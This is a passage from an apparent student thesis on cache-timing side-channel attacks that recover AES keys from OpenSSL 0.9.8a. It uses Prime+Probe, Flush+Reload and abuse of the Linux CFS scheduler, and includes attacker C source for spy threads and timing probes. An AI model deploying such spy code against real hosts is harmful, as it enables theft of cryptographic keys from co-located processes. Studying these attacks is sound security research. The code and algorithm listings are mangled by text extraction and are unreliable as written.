both the scenarios. We will then comment on the practicality to launch the attacks

in such situations and problems faced in the implementation.

We will then propose our approach which is a combination of the above attacks

and how it can help us to mount the attack in practise.

Let us consider the first scenario, where the data tables are not shared and

thus attacker does not know the position of the cache.

6.2 Cache access measurement

We can use one of the below two techniques to find out the cache block(s) accessed

by the victim process.

1. Measurement using Evict+Time[7] In this method, we manipulate the

state of the cache before each encryption, and observe the execution time of

the subsequent encryption. In a chosen-plaintext setting, the method proceeds

as follows :

• For each table l = 0, 1, 2, 3 do

– For each block y = 0, 1 . . . 15 do

(a) For plaintext p, run AES to get the blocks used by AES into the

cache.

(b) For the same plaintext p, run AES again and measure the time taken

for encryption, cachedT ime, with all blocks in the cache

(c) (Evict Phase) Evict the block y of table l

21

(d) For the same plaintext p, run AES again and measure the time taken

for encryption after eviction, evictedT ime, with one block evicted.

(e) (Time Phase) Note the time taken for encryption with eviction

2. Measurement using Prime+Probe [7] This measurement method tries

to discover the set of memory blocks read by the encryption a posteriori, by

examining the state of the cache after encryption. The attacker allocates a

contiguous byte array A[0, ... , S∗W ∗B−1]. This method proceeds as follows :

• For each table l = 0, 1, 2, 3 do

– For each block y = 0, 1 . . . 15 do

(a) Access ’W’ memory block in ’A’ that map to same cache set as that

of y to evict the block y

(b) (Prime Phase) Read the same ’W’ memory block again and measure

the time taken to read all ’W’ blocks, cachedT ime, with all ’W’

blocks in cache

(c) For plaintext p, run AES to get the blocks used by AES into the

cache.

(d) (Probe Phase) Again read the same ’W’ blocks and measure the time

taken to read all ’W’ blocks, checkblockUsed times

Figure 6.1: Fig a,b,c are for Evict-Time, while Fig d,e are for Prime-Probe [7]

The problem with Evict + Time method is that, it will only give information

about one table access per encryption. So, to get the information about all the table

accesses during a particular encryption, we need to run the encryption of same plain

text for each cache set. If we assume, AES tables occupy 64 cache blocks, we need

to run this Evict + Time 64 times for measuring accesses of just single encryption.

This scenario is quite unrealistic, which requires same data to be encrypted again

and again.

22

Here, if we don’t know the offset from where the tables start, we need to fill the

whole cache again and again and measure the cache accesses of a small subset of

cache in which the tables reside. One optimization could be to first find out the

location where the AES tables are in the memory and then use the above strategies

by just filling a small portion of the cache. To find the location of the tables, we can

use Prime + Probe attack. We will simply give a score to each cache set if we find

out that some process has accessed that location. If we do this repeatedly, there

are high chances that the locations which are accessed by AES get a high score,

because they have been accessed each time we did our probe, while other may not

be accessed each time[9].

Figure 6.2: Graph showing cache sets with high Access Time. These are likely tobe the location where AES tables are mapped[9].

Once we fixed that these are the bounds of our tables, we can just fill these cache

lines only in Prime + Probe attack. The above method will not work in the case of

Hardware pre-fetching, where for every line accessed, the next line is automatically

fetched. We will discuss this in more details in further sections.

After getting the table accesses for each encryption, we will use One Round

and Two round attack to get the final key. These are discussed in the next

sections.

6.3 First Round Attack

For attacking AES, a natural approach is to observe the lookups performed in the

first round[7]. The table accesses are simply xi = pi ⊕ ki for all i = 0 - 15 each of

which depend on only one key byte and one plaintext. We already have the plaintext

for the encryption. So, any knowledge related to xi will reveal some information

about key bits.

23

Since each cache block contains 16 table entries and each table contains 256

entries, each table will be mapped to 16 cache blocks. Thus any information about

the access of any particular cache block gives information about the 16 entries as a

whole, i.e. about the first 4 bits. So, we will be able to figure out the first 4 bits of

each key byte using one round attack.

Ideally, we would require the first 16 accesses in order. However, in the given

scenario, we do not have that leverage. Rather, we have cache accesses of the whole

encryption, i.e. we know during the whole encryption which cache blocks out of

64/80 cache blocks are accessed by the victim process. In such scenario, we can

discover the partial information about key bytes as follow.

Consider the case where 〈pi⊕ ki〉4 is indeed present in the list of accesses of that

particular encryption. We can say that this key ki can be a probable candidate for

the actual key. However, if 〈pi ⊕ ki〉4 is not present in the list of accesses, we can

say for sure that this particular key byte will definitely not be my key. The reason

for this is, if this would have been my key byte, than the access corresponding to

〈pi ⊕ ki〉4 must be present in the list of accesses as this particular line must have

been accessed in the first round itself.

In real scenario, due to noise and inaccuracy of measurements, we will not remove

the key values if the corresponding access is not found, rather we will give each a

score of 1 every time it is found and a score of 0 if it is not found.

At the end, when we plot the graph the actual key values should have a peak

because if must have been there in all the encryptions.

This algorithm specifies how one round attack can be implemented.

Note: For plaintext bytes 0, 4, 8, 12 we look at table T0 and so on[1].

Algorithm 2 One Round Attack

1: while true do2: for each plaintext pi do3: for each possible key value (0-255) do4: xi ← 〈pi ⊕ ki〉45: if xi is present in list of accesses then6: graph[i][ki] ← graph[i][ki] + 17: end if8: end for9: end for10: end while

24

6.4 Second Round Attack

The above one round attack has reduced the key space from 128 bits to 64 bits as

for each key byte we are able to retrieve 4 bits. Second round attack is also based

on the same principle of cache accesses as the first round. The only difference is

that unlike the first round, where the cache accesses are simply 〈pi ⊕ ki〉4 the cache

accesses in the second round are based on the outcome of the first round. Each

round scrambles the data in non-linear fashion.

For the second round, we specifically exploit these 4 equations[16]:

Figure 6.3: Equations for second round attack

Here, the key bits which are S-boxed will affect the result of equation in a non

linear way. That means, a change in the least significant 4 bits of a key value can

affect the most significant value of the result. However, this is not the case with

the key byte which are directly xored. If we observe these equations, we will notice

that for each equation, we only have to find out the lower key bits of only 4 keys.

For example, in first equation, lower bits of only k0, k5, k10, k15 will affect the most

significant bits of the result, i.e. they will affect the table access.

So now, we have 16 possible values for each key byte, and each equation has

4 of them. Thus we have total of 164 = 65536 combinations. For each combina-

tion, we apply the same principle as before, i.e. giving the candidate score to that

combination using which we get the access in the list of accesses.

These attacks are based on the assumption that we accurately get the accesses

of the whole encryption. This requires proper synchronization between victim and

attacker process. This is not practical in most of the scenarios.

25

Chapter 7

Cache attacks by exploiting CFS

7.1 Overview

The synchronous attack that has been explained in the previous section is an effi-

cient way to recover key, howeve it is limited to scenarios where the attacker obtain

known plaintexts and has some interaction with the encryption code which allows

him to execute code synchronously before and after encryption. In this section we

describe a class of attacks that eliminate these prerequisites. The attacker will exe-

cute his own program on the same processor as the Victim program performing AES

encryption, but with no explicit interaction such as inter-process communication,

the only knowledge assumed is about a non-uniform distribution of the plaintexts

or ciphertexts.

This chapter describes an attack which is based on the assumption that the spy

process is able to observe every single memory access made by the victim. This high

granularity is achieved by exploiting the behaviour of Completely Fair Scheduler

(CFS) used by Linux kernel.

In next section, we deal with how CFS works and how it can be exploited to

allow the victim process so little time so that it can only make one access in that

duration.

7.2 Completely Fair Scheduler

To gather table accesses in case of shared memory scenario, we need some kind of

synchronization mechanism so that the attacker can observe each and every victim

access.

For this, we as an attacker requires that whenever we want, Operating System

should preempt the victim process and allow attacker to run, which in turn will

26

gather the required memory accesses. For this task of allotting CPU to processes,

scheduler comes into picture. This task of preempting the victim process at will and

gathering required accesses is not easy, as the scheduler has to maintain fairness

among all processes, while achieving maximum throughput at the same time.

So, for achieving the same, we need some kind of attck mechanism on scheduling

capability of Operating System. This paper deals with exploiting an implemenata-

tion of scheduler, known as Completely Fair Scheduler (CFS).

So, lets discuss in brief, how it perform the task of scheduling. This scheduler

tries to behave like an ideal system while giving fair share to each process. To

achieve this, it maintains a virtual runtime of each process, which denotes the time

spent by process while running. So, virtual runtime of running process will increase

at a particular moment in time.

CFS maintains fairness by allowing a process to increase it virtual runtime only

upto a certain bound, after which, it will preempt the process and will select the

process with least virtual runtime at that moment.

This is clearly explained with the help of the given diagram. Here, three processes

are running on a multitasking system. At start, process 1 is activated because it

has least virtual runtime. After allowing the process to run, its virtual runtime

will increase and at the point where maximum unfairness is reached, the next

process is scheduled.

Figure 7.1: Functioning of the Completely Fair Scheduler.[11]

7.3 Attacking CFS

This feature of fairness can be exploited by the attacker in the following way. The

basic idea is that the attacker process requests most of the available CPU while

27

leaving very small intervals for victim process. In this small time, victim access a

memory location, thus bringing the table in cache, and gets scheduled out. Attacker

then gains control and thus can figure out the cache line accessed by the victim. To

achieve this, the attacker process launches some hundred identical threads which ini-

tialize their virtual runtime to as low as possible by blocking for sufficiently amount

of time. The following steps are then performed in a round robin fashion:

• Upon getting activated, thread i first measures which memory access were

performed by V since the previous measurement.

• It then computes tsleep and twakeup, which designate the points in time when

thread i should block and thread i + 1 should unblock, respectively. It pro-

grams a timer to unblock thread i + 1 at twakeup.

• Finally, thread i enters a busy wait loop until tsleep is reached, where it blocks

to voluntarily yield the CPU.

Figure 7.2: Denial Of Service attack on CFS.[11]

Due to a large number of threads the virtual runtime will increase very slowly

and thus whenever scheduler looks at a process to run, it will always choose the

attacker process over victim.

7.4 Retrieving Key

Once we get the cache accesses, we can use the following method[11] to retrieve the

key.

28

AES encryption can be described by this single relation:

Y = M • s(X)⊕K. (7.1)

where, X and Y are state matrix before and after a particular encryption round,

M is the matrix for mix-column step.

X denotes the row-shifted matrix.

and K is the key.

Also, any two consecutive rounds of the same encryption can be put together in

the form of this equation.

ki∗ = y

i

∗ ⊕ (M • s(xi))∗ (7.2)

where, a denotes that it is the 4 byte column vector,

a denotes that the row shofting is applied,

a∗ denotes the leaked bits from cache accesses, which are 5 in case of compressed

table and 4 otherwise.

The basic steps of the finding the key bits are:

1. We treat each of the N accesses as the beginning of a round.

2. For each beginning, we calculate the potential candidates of keys from the

above equation.

3. Based on the different sets of potential candidates, we calculate the keys which

are most probable. This assumption is based on the fact that, if the potential

beginning is correct, the possible keys generated from those are correct.

29

Chapter 8

Design & Implementation of

Espionage Infrastructure

8.1 Flush+Reload Technique

The Flush+Reload attack is a powerful access-driven cache-based side-channel attack

technique. It was proposed by Gullasch et al.[11] but was first named by Yarom et

al.[18]. It usually employs a spy process to check if specific cache lines have been

accessed or not by the attacker’s code. The attack is carried out by a spy process

which works in 3 stages:

Flushing Stage :

In this stage, the attacker flushes the desired memory lines from the cache using

clflush command and hence make sure that they have to be retrieved from the

main memory next time they need to be accessed. The attack would work even if

attacker and victim reside on different cpu cores as clflush flushes memory lines

from all cpu cores.

Accessing the target :

Attacker waits until the Victim process runs a fragment of code, which might use

the memory lines that have been flushed in the first stage.

Reloading Stage :

In reload stage the attacker reloads again the previously flushed memory lines and

measures the time it takes to reload. Depending on the time taken to fetch the

memory lines, the attacker decides whether the victim accessed the memory line or

30

not. If victim would have accessed the memory lines then it would be present in

the cache and if not then it won’t be present in the cache. The following figures the

timing diagrams of various scenarios where victim and attacker accesses the same

cache line. Fig A and B shows the timing diagram without and with victim accessing

the cache line. While doing the experiments, we need to look for some cases, where

victim does not access the cache precisely at a time, which attacker wants. Rest

three diagram, C, D and E shows the timing diagram for such cases.

Figure 8.1: Flush - reload attack timings [18]

The implementation of attack is in Figure 8.2. The code measures the time

to read the data at a memory address and then evicts the memory line from the

cache[18]. The implementation has been given as code within the asm command.

The assembly code takes input as the address that is stored in %ecx (Line 16).

It returns the time to read this address in the register %eax which is stored in the

variable time(Line 15).

The threshold used in the attack is system dependent. For our core i-5 system,

we will set it to 100 that we will be discussing in the next section.

31

Figure 8.2: Code for the Flush+Reload Technique [18]

8.2 Our espionage infrastructure

Our espionage infrastructure in Figure 8.3 consists of three important parts:Spy

Controller [SC], Spy Ring and Centre of Advanced Analytics [CAA].

The SC residing in one cpu core controls the spy threads running on another core.

CAA, implemented with analytical abilities is responsible for providing dynamic

delay instructions to SC so that V can be restricted to fewer access to the memory

lines. Lower the value of the access to the memory lines by the Victim, more accurate

will be the results.

32

Figure 8.3: The Espionage Network.

For the successful attack, our aim is to execute spy threads and V as shown in

Figure 8.4. V is running on a core where spy rings are also scheduled by the SC.

This make OS to divide the CPU time quantum equally into spies and Victim. We

are calling each instance of V ( when V is getiing its turn to run) as run. In each

run of V, it performs the AES encryptions and brings data into cache. The default

time slice (or quantum) assigned by the OS to a process is large enough to make

thousands of cache accesses. So, to stop OS to provide this large quantum to V, our

espionage infrastructure restrict it to have very small time slice.

Figure 8.4: Timeline of victim and spy threads.

Scheduling is a central idea in multitasking Operating System where CPU time

has to be multiplexed in different running processes giving illusion of parallel execu-

tion. Completely Fair Scheduler has been equipped in all the Linux systems starting

from kernel version 2.6.23[11].

To ensure that fair time is allocated to the all processes, the CFS introduces the

concept of virtual runtime associated with each processes. In an ideal scenario, if

we consider total no. of processes running on a CPU core is n then time quantum

33

allocated to each of the processes is 1/n. To achieve this on a realtime system, the

CFS introduces a virtual runtime τi for every process i. In Figure 8.4, the sum of

the CPU times allocated to V is equal to that of the times given to each of the spy

threads running on that core.

In our attack implementation, each spy threads performs the measurement of

access times of each cache lines containing AES lookup tables and then flushes the

tables from all levels of cache. Each spy threads after performing above work signals

the SC through a shared variable, finished to awake the next threads of the ring.

It then waits for an amount of time δ1 before blocking on cond variable. This is

where the victim comes in the picture. All spy threads are in blocking state and OS

resumes the execution of Victim(V).

Algorithm 3 Spy Threads

1: SpyThreads Ti2: while true do3: for each cacheLine containing AES tables do4: if accessTime[cacheLine]< THRESHOLD then5: isAccessed[cacheLine] ← true6: clflush(cacheLine)7: end if8: end for9: mutexLock(var)10: finished← true11: mutexUnlock(var)12: delay loop by time = δ113: end while

The SC continuously checks on the finished flag, once it is true, it delay with

the δ2 time and signals the next spy in the ring to start its execution. The time

delay δ2 is optional as it is only required when no. of accesses by victim is more

than what is suitable for the attack. So, we can restrict the no. of accesses to the

lookup tables by varying the value of δ2.

Our attacks has been designed to work on multiple cores system. Before the

actual attack begin and Victim starts performing the AES encryptions, attacker

schedules its ring of spy threads into the same CPU cores where V reside. SC has to

work on another CPU core alone so that it can send signals without any battle for

the CPU immediately. The Centre for advanced analytics (CAA) can be employed

on any remaining cores including the cores at which SC execute.

The delay loops of δ1 and δ2 is used to fine tune the whole setup so that victim

34

Algorithm 4 Spy Controller

1: while true do2: while finished 6= true do3: end while4: delay loop by time = δ25: condSignal(nextThread)6: mutexLock(var)7: finished=false8: mutexUnlock(var)9: end while

could access the minimum cache lines in its time quantum. Increasing the value

of δ1 decreases the total no. of accesses by the victim as it will use some of the

portion of Victim time. Contrast to this, if we increase the value of δ2 it will allow

V to execute for δ2 extra time hence no. of accesses to the cache lines by V will be

increased.

The value of THRESHOLD in Algorithm 3 has been decided on the basis of time

taken to bring data back in cache after flushing it from all levels of cache memory.

The distribution of time taken(in ticks) for cache hits and miss has been clearly

presented in the Figure 8.5. On the basis of this, we fixed threshold = 100 ticks.

Figure 8.5: Frequency Vs Cache Access Time(ticks).

35

8.3 Approach for Attack

The previous attack is based on the assumption that we can get each access made

by victim. Now, a single table access generally takes less than 100 ns to complete.

That said, it means that victim is scheduled for just around 100 ns every time it

gets access. It seems quite unrealistic. To relax such constraints we propose a

combination of both the attacks, where we will exploit CFS to gather the memory

accesses and use the last table as a synchronization mechanism to know the table

accesses of an encryption.

In this case, we will assume shared table scenario, as the OpenSSL implemen-

tations which we are targeting are shared by default. Here, we assume that victim

is continuously encrypting the data and thus accessing the tables. This assumption

is very much realistic as we can consider the victim to be cloud service providing

encrypted data storage as a service with an unknown key. User, in this case the

attacker, can ask for the cloud service to encrypt the data, which then starts its

encryption sequence and continue encrypting till the end.

We will exploit CFS to gather memory accesses of the victim, but unlike the

previous case, we do not require each individual access, rather we can allow a chunk

of accesses to the victim. For example here, we will give the results of experiments

based on chunk of below 30 accesses.

After getting the accesses, we propose the following algorithm for achieving the

synchronization.

8.3.1 Algorithm

For each group of accesses, check the following:

If that group contains some last table entries, consider that group and next 2

groups as table accesses of next encryption.

This is because the group containing last table accesses can be in one of the

states and in each case, we justify our approach in Chapter 10.

After getting the accesses, we will use first round and second round attacks to

recover the complete AES key as described in section 6.3 and section 6.4.

36

Chapter 9

Coding

9.1 Experimental Setup

Our experiments were performed on Intel(R) Core-i5 2540M [email protected] ma-

chine running Debian Kali Linux 1.1.0, 64bit, kernel version 3.14.5/3.18 using the C

implementation of AES in OpenSSL 0.9.8a. This version of OpenSSL uses a separate

table for the last round of encryption. The core-i5 has 3-level cache architecture.

The L1 cache is 32KB (8-way associative), L2 cache is 256KB (8-way associative)

and L3 cache is 3MB (12-way associative). Each CPU core has private L1 and L2

cache whereas L3 is shared among different CPU cores.

The coding chapter includes code snippets of major components of our espionage

infrastructure. Source code for the attack has been written in basically C language

as the language in which kernel has been programmed is C. We have also written

various scripts in python to automate our attack and generate the results. The

major work done here is performed by SC and spy threads. The victim will be

performing the AES encryptions. For AES encryptions, we have used aes core file

that contains the tables and aes encrypt() function. In our Victim code, AES

encryptions is being performed 100 times with different plaintexts.

Followings are the major sections of the code in our attacker process:

9.2 Attacker source code

1 #de f i n e GNU SOURCE //Assuming a l l header f i l e s inc luded

2 #i f n d e f POSIX THREAD PROCESS SHARED

3 #er r o r This system does not support p roce s s shared mutex

4 #end i f

5

37

6 #de f i n e NUMTHREADS 15

7 #de f i n e MAXCOUNT 10000

8

9 i n t segmentId ;

10 i n t segmentChildId ;

11 i n t segmentcheckId ;

12 i n t ∗ currThread ;

13 i n t ∗ ch i l d ;

14 i n t ∗ ch e ck s t a t e ;

15 pthread cond t ∗ cvptr [NUMTHREADS+1] ;

16 pthr ead condat t r t c a t t r [NUMTHREADS+1] ;

17

18 pthread cond t ∗ cvptrChi ld ; //Condit ion Var iab le Po inte r s o f Child

19 pthr ead condat t r t ca t t rCh i l d ; //Condit ion Var iab le At t r ibute s o f Child

20 pthread mutex t ∗mptr [NUMTHREADS+1] ; //Mutex Po inte r s

21 pthread mutexatt r t matr [NUMTHREADS+1] ; //Mutex Att r ibute s

22

23 pthread mutex t ∗mptrChild ; //Mutex Po inte r s

24 pthread mutexatt r t matrChild ; //Mutex Att r ibute s

25

26

27 i n t shared mem id ; // shared memory Id

28 i n t ∗mp shared mem ptr ; // shared memory ptr −− po in t ing to mutex

29 i n t ∗ cv shared mem ptr ; // shared memory ptr −− po in t ing to cond i t i on

va r i ab l e

30

31 i n l i n e void c l f l u s h ( v o l a t i l e void ∗p)32 {33 asm v o l a t i l e ( ” c l f l u s h (%0)” : : ” r ” (p) ) ;

34 }35

36 unsigned long probe ( char ∗ adrs ) {37 v o l a t i l e unsigned long time ;

38 asm v o l a t i l e (

39 ” mfence \n”40 ” l f e n c e \n”41 ” rd t s c \n”42 ” l f e n c e \n”43 ” movl %%eax , %%e s i \n”44 ” movl (%1) , %%eax \n”45 ” l f e n c e \n”46 ” rd t s c \n”47 ” sub l %%es i , %%eax \n”48 ” c l f l u s h 0(%1) \n”49 : ”=a” ( time )

50 : ” c” ( adrs )

38

51 : ”%e s i ” , ”%edx” ) ;

52 re turn time ;

53 }54

55 s t r u c t s ha r ed u s e s t

56 {57 unsigned long long acc e s s count ;

58 i n t f l a g ;

59 i n t t h r e ad s t a t e ;

60 unsigned long long check count ;

61 } ;62

63 s t r u c t s ha r ed u s e s t ∗ s h a r e d s t u f f ;

64

65 create shared memory ( )

66 {67 void ∗ shared memory=(void ∗) 0 ;68

69 i n t shmid ;

70 shmid =shmget ( ( key t ) 1234 , 4096 , 0666 | IPC CREAT ) ;

71 shared memory =shmat ( shmid , ( void ∗) 0 ,0) ;72

73 i f ( shared memory == ( void ∗)−1)74 {75 f p r i n t f ( s tde r r , ”shmat f a i l e d \n” ) ;76 e x i t (EXIT FAILURE) ;

77 }78 s h a r e d s t u f f = ( s t r u c t s ha r ed u s e s t ∗) shared memory ;

79

80 }81

82 typede f s t r u c t thread parameters {83 long id ;

84 i n t loop count ;

85 } THREAD;

86

87 void ∗parentThreads ( void ∗ thread id )

88 {89 long t i d ;

90 t i d = ( long ) thread id ;

91 i n t s i d = s y s c a l l ( SYS gett id ) ;

92 i n t counter = 0 ,sum ;

93 unsigned long long s ta r t , end ;

94 unsigned long long changed sha r ed va r i ab l e a c c e s s c oun t [MAXCOUNT] ;

95 unsigned long long changed shar ed var i ab l e check count [MAXCOUNT] ;

96 unsigned long Access Time [MAXCOUNT] [ 8 0 ]={0} ;

39

97 i n t k=0;

98 FILE ∗ fp ,∗ fp2 ,∗ fp3 ;

99 pthread t thread ;

100 thread = p th r e a d s e l f ( ) ;

101

102 c pu s e t t my set ;

103 CPU ZERO(&my set ) ;

104 CPU SET(2 , &my set ) ;

105 s c h e d s e t a f f i n i t y (0 , s i z e o f ( c pu s e t t ) , &my set ) ;

106 i n t s ;

107

108 const u32 ∗p0=address (0 ) ;





113 void ∗p5=&AES set encrypt key ;

114 void ∗p6=&AES encrypt ;

115

116 // Flush a l l l l okup t ab l e s from cache

117 f o r ( s=0; s<18; s++)

118 {119 c l f l u s h ( ( void ∗) ( p0+s ∗16) ) ;120 // S im i l a r l y a l l o the r s t ab l e s

121 }122 whi le (1 )

123 {124

125 pthread mutex lock ( mptr [ t i d ] ) ;

126 whi le (∗ currThread != t i d )

127 {128 pthread cond wait ( cvptr [ t i d ] , mptr [ t i d ] ) ;

129

130 }131 pthread mutex unlock (mptr [ t i d ] ) ;

132

133 // s t o r e value o f shared va r i ab l e at the time o f r e c e i v i n g s i g n a l

134 changed sha r ed va r i ab l e a c c e s s c oun t [ counter ]= sha r ed s t u f f−>acc e s s count ;

135

136 i f ( counter==30 && t id ==0) // no t i f y V to s t a r t AES. We delayed i t

as to s t a r t AES at s t ab l e cond i t i on

137 s h a r ed s t u f f−>f l a g =1;

138

139 i f (∗ currThread == t id )

140 {

40

141 // Find Access time

142 f o r ( s=0; s<16; s++)

143 {144 k=0;

145 Access Time [ counter ] [ s+16∗k]=probe ( ( char ∗) ( p0+s ∗16) ) ;146 k=1;

147 // S im i l a r l y a l l f our remaining

148 }149

150 ∗ currThread = (∗ currThread + 1)%NUMTHREADS;

151 // s i g n a l to ch i l d

152 pthread mutex lock ( mptrChild ) ;

153 ∗ ch i l d =1;

154 pthread mutex unlock ( mptrChild ) ;

155

156 }157 counter++;

158 v o l a t i l e i n t check counter =0;

159 whi le ( check counter++<15) ;

160

161 i f ( counter==MAXCOUNT/NUMTHREADS)

162 {163 break ;

164 }165 }166 pthread mutex lock ( mptrChild ) ;

167 f o r ( counter=0; counter<(MAXCOUNT/NUMTHREADS) ; counter++)

168 {169 f o r ( k=0;k<5;k++)

170 {171 f o r ( s=0; s<16; s++)

172 {173 // p r i n t f ( ”%ld , Access Time[%d]=%lu \n” , t id , s+16∗k , Access Time [

counter ] [ s+16∗k ] ) ;174 i f ( Access Time [ counter ] [ s+16∗k ] < 150 )//==44 | |

Access Time [ counter ] [ s+16∗k ] ==48)

175 p r i n t f ( ”%d,%ld ,% l l u , Access Time , [%d] ,% lu \n” , counter , t id ,

changed sha r ed va r i ab l e a c c e s s c oun t [ counter ] , s+16∗k , Access Time [

counter ] [ s+16∗k ] ) ;176 }177 }178 }179 pthread mutex unlock (mptrChild ) ;

180

181 pth r ead ex i t (NULL) ;

182 }

41

183

184 i n t main ( )

185 {186 i n t rtn ;

187 s i z e t shm s ize ;

188 /∗ i n i t i a l i z e shared memory segment ∗/189 shm s ize = (NUMTHREADS+1)∗ s i z e o f ( pthread mutex t ) + (NUMTHREADS+1)∗

s i z e o f ( pthread cond t ) ; // f o r new cond va r i ab l e we added 1∗ s i z e o f (pthread cond t )

190

191 i f ( ( shared mem id = shmget (IPC PRIVATE, shm size , 0660) ) < 0)

192 {193 per ro r ( ”shmget” ) , e x i t (1 ) ;

194 }195 i f ( ( mp shared mem ptr = ( i n t ∗) shmat ( shared mem id , ( void ∗) 0 , 0) )

== NULL)

196 {197 per ro r ( ”shmat” ) , e x i t (1 ) ;

198 }199

200 i n t nt ;

201 unsigned char ∗ byte pt r = ( unsigned char ∗) ( mp shared mem ptr ) ;

202 f o r ( nt = 0 ; nt<=NUMTHREADS; nt++){203 mptr [ nt ] = ( pthread mutex t ∗) byte pt r ;

204 byte pt r += 1∗ s i z e o f ( pthread mutex t ) ;

205 cvptr [ nt ] = ( pthread cond t ∗) byte pt r ;

206 byte pt r += 1∗ s i z e o f ( pthread cond t ) ;

207 }208 mptrChild = ( pthread mutex t ∗)mptr [NUMTHREADS] ;

209 cvptrChi ld = ( pthread cond t ∗) cvptr [NUMTHREADS] ;

210

211 // Setup Mutex

212 f o r ( nt = 0 ; nt<=NUMTHREADS; nt++)

213 {214 i f ( r tn = pthr ead mutexa t t r i n i t (&matr [ nt ] ) )

215 {216 f p r i n t f ( s tde r r , ” p th r e a s mut exa t t r i n i t : %s ” , s t r e r r o r ( rtn ) )

, e x i t (1 ) ;

217 }218

219 //Setup Condit ion Var iab le

220 i f ( r tn = p th r e ad c onda t t r i n i t (& ca t t r [ nt ] ) )

221 {222 f p r i n t f ( s tde r r , ” p th r e ad c onda t t r i n i t : %s ” , s t r e r r o r ( rtn ) ) , e x i t (1 )

;

223 }

42

224 }225 i n t sha r eS i z e = s i z e o f ( i n t ) ∗ (2 + 1) ;

226 segmentId = shmget (IPC PRIVATE, shareS i ze , 0660) ;

227 currThread = ( i n t ∗) shmat ( segmentId , NULL, 0) ;

228 ∗ currThread = 0 ; // shared va r i ab l e f o r thread among parent and ch i l d

229

230 i n t s ha r e ch i l d = s i z e o f ( i n t ) ∗ (2 + 1) ;

231 segmentChildId = shmget (IPC PRIVATE, sha re ch i ld , 0660) ;

232 ch i l d = ( i n t ∗) shmat ( segmentChildId , NULL, 0) ;

233 ∗ ch i l d = 0 ; // shared va r i ab l e f o r thread among parent and ch i l d

234

235 i n t sharecheck = s i z e o f ( i n t ) ∗ (2 + 1) ;

236 segmentcheckId = shmget (IPC PRIVATE, sharecheck , 0660) ;

237 ch e ck s t a t e = ( i n t ∗) shmat ( segmentcheckId , NULL, 0) ;

238 ∗ ch e ck s t a t e = 0 ; // shared va r i ab l e f o r thread among parent and

ch i l d

239 create shared memory ( ) ;

240 s h a r ed s t u f f−>t h r e ad s t a t e =2;

241 s h a r ed s t u f f−>check count =0;

242

243 p id t pid , id ;

244 i n t i ;

245

246 pid = fo rk ( ) ;

247 id = getp id ( ) ;

248

249 i f ( pid > 0)

250 {251 // In parent

252 pthread t threads [NUMTHREADS] ;

253 i n t rc ;

254 long t ;

255 f o r ( t=0; t<NUMTHREADS; t++)

256 {257 rc = pthr ead c r ea t e (&threads [ t ] , NULL, parentThreads , ( void ∗) t ) ;258 i f ( rc )

259 {260 p r i n t f ( ”ERROR; return code from pthr ead c r ea t e ( ) i s %d\n”

, rc ) ;

261 e x i t (−1) ;262 }263 }264 pth r ead ex i t (NULL) ;

265

266 }267 e l s e

43

268 {269 // In Child

270 pthread t thread ;

271 thread = p th r e a d s e l f ( ) ;

272 c pu s e t t my set ; /∗ Def ine your cpu se t b i t mask . ∗/273 CPU ZERO(&my set ) ; /∗ I n i t i a l i z e i t a l l to 0 , i . e . no CPUs s e l e c t e d

. ∗/274 CPU SET(1 , &my set ) ; /∗ s e t the b i t that r ep r e s en t s core 1 . ∗/275 s c h e d s e t a f f i n i t y (0 , s i z e o f ( c pu s e t t ) , &my set ) ; /∗ Set a f f i n i t y o f

t h i s p roc e s s ∗/276 i n t check counter =0;

277 long i n t counter = 0 ;

278 whi le ( counter++<MAXCOUNT)

279 {280 whi le ( ! ∗ ch i l d ) ; // wait t i l l s e t by Thread

281 v o l a t i l e i n t wa i t c h i l d =0;

282 // whi l e ( wa i t c h i l d++<10) ;

283

284 pthread mutex lock ( mptrChild ) ;

285 ∗ ch i l d =0;

286 pthread mutex unlock ( mptrChild ) ;

287 pth r ead cond s i gna l ( cvptr [∗ currThread ] ) ;

288 }289 }290 re turn 1 ;

291 }

44

Chapter 10

Results and Analysis

The first thing that has to be decided by us is to check the time taken by the cache

memory to access the cache lines by the victim. From the previous experiment we

have seen in the figure 8.5 that time taken by V to access the memory lines from the

cache is in the range of 32-68 for our system. So, we decided the threshold value to

be 100 which clearly separate the value of time to bring data from cache and main

memory(which takes more than 200 ticks time).

On the basis of the threshold value decided in the section 8.2, we have performed

our experiment using our espionage network with different no. of spy threads. The

no. of accesses by Victim should decrease as we increase the no. of spy threads

(Section 8.2). The no. of distinct memory accesses has be clearly depicted in the

Figure10.1 and Figure10.2. We are currently able to restrict V to access only between

18-27 accesses in each run which is enough for the success of our attack.

For the proper understanding of our results, we have written codes in our Spy

Controller (Chapter 9) to print the exact cache lines into a file, accessed by the

Victim which was detected by the spy in its turn. So our access results includes the

no. of cache line accesses by the Victim in each run but detected in spy turn with

corresponding AES tables information.

45

Figure 10.1: #Accesses per run(#spy threads=10).

In Figure10.1, where no. of threads are 10 in spy ring, we can see that the

average accesses are in the range of 22-37 while in the case of Figure10.2, where

ring of spy threads contains 40 thrads, no. of accesses are in suitable range for our

attack.

Figure 10.2: #Accesses per run(#spy threads=40).

For the same plaintext encrypted 100 times by Victim, results of few access has

been shown in the following Figure 10.3. It clearly depict the start of encryption

46

where all the accesses are of AES look-up tables T0, T1, T2 and T3. Accesses in

the fifth table T4 depict the ending of the encryption as cache lines in the range of

64-79 is being accessed. Sometimes the tables of the new encryption can be noticed

in the last round of the previous encryption. This indicate that the last round of the

previous encryption include the few tables of the beginning of the next encryption.

Figure 10.3: Cache accesses detected by Spy threads.

We can resolve the above stated conflicting accesses for our attack as explained

in the Table 10.1

Here, we have taken ideal memory accesses from an actual implementation of

AES encryption of OpenSSL vs 0.9.8a. This part is basically to solidify our point,

that if we apply modifications as discussed in previous section, we will still be able

to generate the keys.

For such set-up, we made changes in OpenSSL AES code to print the table

accesses in a file, such that the table offsets are printed. We gathered this data for

as many as 100000 encryptions with a single key.

Results worth mentioning are explained here with the graphs as mentioned in

[4].

1. If in ideal scenario, attacker could get all the accesses of an encryption and

that too in order, only one encryption is needed to get the keys from the first

round attack, and less than 5 encryptions for the second round attack to

recover complete key.

47

S.No. Accesses contained in agroup with last table entries

Observations

1 (A) Accesses from currentencryption (9th round).(B) Last round Accesses.(C) Accesses from nextencryption (1st round).

As we are not concerned about entries otherthan first two rounds, data from current en-cryption is of no use to us. But the datacontaining first round of next encryption isimportant to us. So it’s better to considerall accesses as next encryption access.

2 (A) Accesses from Last ta-ble (B) Accesses from firstand second round of nextencryption.

Here also, we need data of next encryption,so we consider the accesses as that of newencryption.

